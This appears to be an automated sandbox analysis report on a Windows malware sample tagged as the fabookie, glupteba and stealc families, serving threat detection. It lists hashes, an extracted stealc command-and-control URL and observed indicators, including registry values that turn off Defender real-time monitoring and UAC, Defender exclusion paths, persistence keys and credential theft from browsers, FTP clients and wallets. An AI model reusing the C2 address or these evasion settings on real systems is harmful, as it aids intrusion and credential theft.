fabookie | 15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5

Analysis

max time kernel
146s
max time network
152s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
16-01-2024 16:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

5.0MB
MD5

2b2eab865b6f06cba30a1c8d51ba2232
SHA1

592e2f8e1d6d72e66e8b164b5039f966e105f6dd
SHA256

15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5
SHA512

3090d14ebade60f15b30f87d62c16352079a87658c77519c385de7bb3fa3f52ade688345a0c09e5501f4e3828752db53fcb51fdb948bf28fc130990a75ee3dcc
SSDEEP

49152:X57qFK3V68ujeUKdHLgRJkkHnrkHhmvuFuvsqH77z1skzWQrzBwtmar58cJMfX92:Qfw0b1ByQr4SxP0

Score

10^/10

fabookie glupteba stealc discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Malware Config

Extracted

Family

stealc

http://185.172.128.79

Attributes

url_path
/3886d2276f6914c4.php

rc4.plain

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/2612-389-0x00000000037E0000-0x0000000003910000-memory.dmp	family_fabookie
behavioral1/memory/2612-535-0x00000000037E0000-0x0000000003910000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 17 IoCs

resource	yara_rule
behavioral1/memory/1992-111-0x0000000002B70000-0x000000000345B000-memory.dmp	family_glupteba
behavioral1/memory/1992-113-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1992-290-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1404-291-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1992-316-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1404-318-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1992-319-0x0000000002B70000-0x000000000345B000-memory.dmp	family_glupteba
behavioral1/memory/2592-332-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1592-347-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2592-361-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1592-387-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2592-425-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1592-429-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2592-445-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2124-448-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1592-450-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2124-556-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Windows security bypass 2 TTPs 48 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WQqkELkVHOYU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mQvpiNUsNPjLC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\UrkGLyjigLRybTVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WQqkELkVHOYU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YYFeagcQEOcPvCau = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mQvpiNUsNPjLC = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\UrkGLyjigLRybTVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YYFeagcQEOcPvCau = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PEKrPVrLutUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YYFeagcQEOcPvCau = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\va5doQL3q4S6YWWF7jom7c9M.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MiKcmJhqU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YYFeagcQEOcPvCau = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\nmNNzXaLg4wXxwjYAX3aGb98.exe = "0"	nmNNzXaLg4wXxwjYAX3aGb98.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MiKcmJhqU = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PEKrPVrLutUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
1744	bcdedit.exe
928	bcdedit.exe
2600	bcdedit.exe
2132	bcdedit.exe
1324	bcdedit.exe
2392	bcdedit.exe
2176	bcdedit.exe
2276	bcdedit.exe
1596	bcdedit.exe
2116	bcdedit.exe
1164	bcdedit.exe
1984	bcdedit.exe
2296	bcdedit.exe
2764	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
1532	netsh.exe
2456	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 12 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yaQlbD6aHDyrXjP5TGmo8rQa.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8LcZE5DSbsSeDaVasnlUqB6i.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Su1yzu56hJaTYcrx4bEiMpP8.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eR1fdDM5LIqgcujEwSQxAXpT.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qWLwQQAfXmOAfCri9oqmWYwf.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xifQbsinAAFWjCpKOwm5qNcY.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2iiB52YWWn5Q6aIwzRxgT3JZ.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\njyTN2W2KsEscE1Tsj6DlcwR.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Y2EbvD2kTjnTgE4CpVQZ8tiA.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DNUTIgcLnP0mfRyNRzI3AHqL.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PMgZRJWV4VNibSuAicJAMS6w.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nqzJcJetq6pMhrBJJLcbDNYv.bat	jsc.exe

Executes dropped EXE 21 IoCs

pid	Process
2612	bd1WomvtfddaPIsukh6Mi1KR.exe
1992	va5doQL3q4S6YWWF7jom7c9M.exe
1404	nmNNzXaLg4wXxwjYAX3aGb98.exe
2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe
1928	BroomSetup.exe
2656	Gt5rsurptCjvilCERkFf7uzk.exe
780	nsyD606.tmp
2592	va5doQL3q4S6YWWF7jom7c9M.exe
1592	nmNNzXaLg4wXxwjYAX3aGb98.exe
1816	YpE68ZZqoIJtLFzcLDzwRo8I.exe
2432	qV0uup9P6YE8qzfGPR6IvK7O.exe
2400	Install.exe
2996	Install.exe
2124	csrss.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
2040	injector.exe
1584	patch.exe
3032	DbWflJW.exe
292	dsefix.exe
1520	windefender.exe
2960	windefender.exe

Loads dropped DLL 48 IoCs

pid	Process
2792	jsc.exe
2792	jsc.exe
2792	jsc.exe
2792	jsc.exe
2792	jsc.exe
2792	jsc.exe
2792	jsc.exe
2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe
2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe
2792	jsc.exe
2792	jsc.exe
2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe
2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe
2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe
2792	jsc.exe
1816	YpE68ZZqoIJtLFzcLDzwRo8I.exe
1816	YpE68ZZqoIJtLFzcLDzwRo8I.exe
1816	YpE68ZZqoIJtLFzcLDzwRo8I.exe
2792	jsc.exe
1816	YpE68ZZqoIJtLFzcLDzwRo8I.exe
2400	Install.exe
2400	Install.exe
2400	Install.exe
2432	qV0uup9P6YE8qzfGPR6IvK7O.exe
2400	Install.exe
2996	Install.exe
2996	Install.exe
2996	Install.exe
2432	qV0uup9P6YE8qzfGPR6IvK7O.exe
2592	va5doQL3q4S6YWWF7jom7c9M.exe
2592	va5doQL3q4S6YWWF7jom7c9M.exe
2792	jsc.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
2124	csrss.exe
852	Process not Found
1584	patch.exe
1584	patch.exe
780	nsyD606.tmp
780	nsyD606.tmp
1584	patch.exe
1584	patch.exe
1584	patch.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
1584	patch.exe
1584	patch.exe
1584	patch.exe
2124	csrss.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ThreadingModel = "Apartment"	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ = "C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\NppConverter.dll"	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ = "C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\NppConverter.dll"	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ThreadingModel = "Apartment"	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ = "C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\NppConverter.dll"	S5KV4yldRzQLMnJBD7trg9f5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2ED1CAC3-5661-FFFE-2CE7-8D413F916553}\InProcServer32\ThreadingModel = "Apartment"	S5KV4yldRzQLMnJBD7trg9f5.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000018b20-348.dat	upx
behavioral1/files/0x0006000000018b20-352.dat	upx
behavioral1/files/0x0006000000018b20-350.dat	upx
behavioral1/memory/2432-390-0x00000000001B0000-0x0000000000698000-memory.dmp	upx
behavioral1/memory/2432-453-0x00000000001B0000-0x0000000000698000-memory.dmp	upx

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\va5doQL3q4S6YWWF7jom7c9M.exe = "0"	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\nmNNzXaLg4wXxwjYAX3aGb98.exe = "0"	nmNNzXaLg4wXxwjYAX3aGb98.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	va5doQL3q4S6YWWF7jom7c9M.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	nmNNzXaLg4wXxwjYAX3aGb98.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DbWflJW.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	DbWflJW.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DbWflJW.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2448 set thread context of 2792	2448	file.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	nmNNzXaLg4wXxwjYAX3aGb98.exe
File opened (read-only)	\??\VBoxMiniRdrDN	va5doQL3q4S6YWWF7jom7c9M.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ClocX\Presets\Cappuccino.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Neon.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Traditional_Chinese.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallStd.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\earth2.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Arabic.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Jaguar2Clock.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\aqua-clock1.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\iSink.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Sounds\alert.mp3	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Ukrainian.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\AquaMade.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Holzwanduhr.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\aquamade.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\minutehand-7.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Sounds\ring2.mp3	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueSphere.bmp	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BubbleClock.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\GuldKugler.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\VioletteKugler.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\domeclock\domemin.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\uninst.exe	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Slovak.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Lang\Srpski.lng	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\Adler.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\AquaB.ini	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockIce.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\WidestoneStudios.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\cowboy2.png	S5KV4yldRzQLMnJBD7trg9f5.exe
File created	C:\Program Files (x86)\ClocX\Presets\hallow2.png	S5KV4yldRzQLMnJBD7trg9f5.exe
